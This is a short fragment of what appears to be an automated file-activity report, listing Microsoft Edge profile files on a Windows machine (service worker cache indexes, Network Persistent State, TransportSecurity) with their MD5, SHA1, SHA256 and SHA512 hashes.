| SHA512 | de9981986910bf042c18b5a656c020e98c24aa40f06544612e0931be25ea947f71749056a36973d9cd0c0cda7ed2ad05619c3275db0f42173ce983f80e63fd3d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 00a424e75ed889c51389255db159e75f |
| SHA1 | fa70f7d14bebc3850cf9c66dcf28b4a4f4177879 |
| SHA256 | eb0263dc7ed7ed0d31814c0ce93f9a4e8cc80df2b3ad409c9e42f08b3f59e68a |
| SHA512 | 9f2765593e468a13bac68e91e89c816803cb1b910dd2c8beb94a34fac638d070551a881cf2d9d88f01dcdc08e6cbe239e7234a9b4ba715d5172283ecb0a09d35 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\5f9d186e-d274-4840-a38d-d54ee180de43\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | acd4b7a8c2d807d2474531d539f6ed65 |
| SHA1 | 26eb3f54fa5273dce270798ba2496b0844ccdbfe |
| SHA256 | 16f3dfbdbf8e685905bf94aa6eb186ec754d7d22af192e69c2576d85ffc02988 |
| SHA512 | a5e5a9f05eca3907b4adad10173b531d9dfa112a2b0c65a723c42049913a1c984581213f4946308ce3e4563d4fa8eb068d8b86d1249289d17183c2410b7c3d8c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3d67fda9b6377398af467490635ae365 |
| SHA1 | 383a629dcdbc09b1cf671ebe831d00938ba7c19c |
| SHA256 | cad712cf4aa6164ff18afe9eb106950a6a020e64d5231cccfb4bc70920053c21 |
| SHA512 | 47f576576c33e67834094d6fc25c6007fd8a228d87746f010f9ced4e8a952feb77cb1890709ec541ecc88269871dc3e4c9c73fc2705e842277eb5e44ed498d52 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 3d6fa1944e7068105d5a6eb09849d249 |
| SHA1 | c18f86bbac211b670cb19c63b60c68d1bbb461db |
| SHA256 | b5b9f12591ef4bd58661335876466f6f2460e481768fc61cf9310b6eaf7fe6cf |
| SHA512 | 235fcb4e020b781df2d89cc41ca9e6ef21a0044c703d72ef8f1785736961afa85436f3bedc9ac14014fbf0c7e5407b9b4c6d0dcba294b5482f55117f1aff2071 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 34981b420684bb1a79d94ea4bfb54175 |
| SHA1 | 2167a1d10c7698c541c88451e2ae1cd608a105ab |
| SHA256 | c666398217329a4d735a346063e195546997e9a5c77b0d67469d33c579029c7a |
| SHA512 | cb2bb1ae8f8d0f4c59cf796e517e04e9c2d8b5ec116448f92279349b422ea03f0bd27487162a4d0334b90bdc73d73c9c5d45f26a4a04ca3a6bd1fbd5370438ff |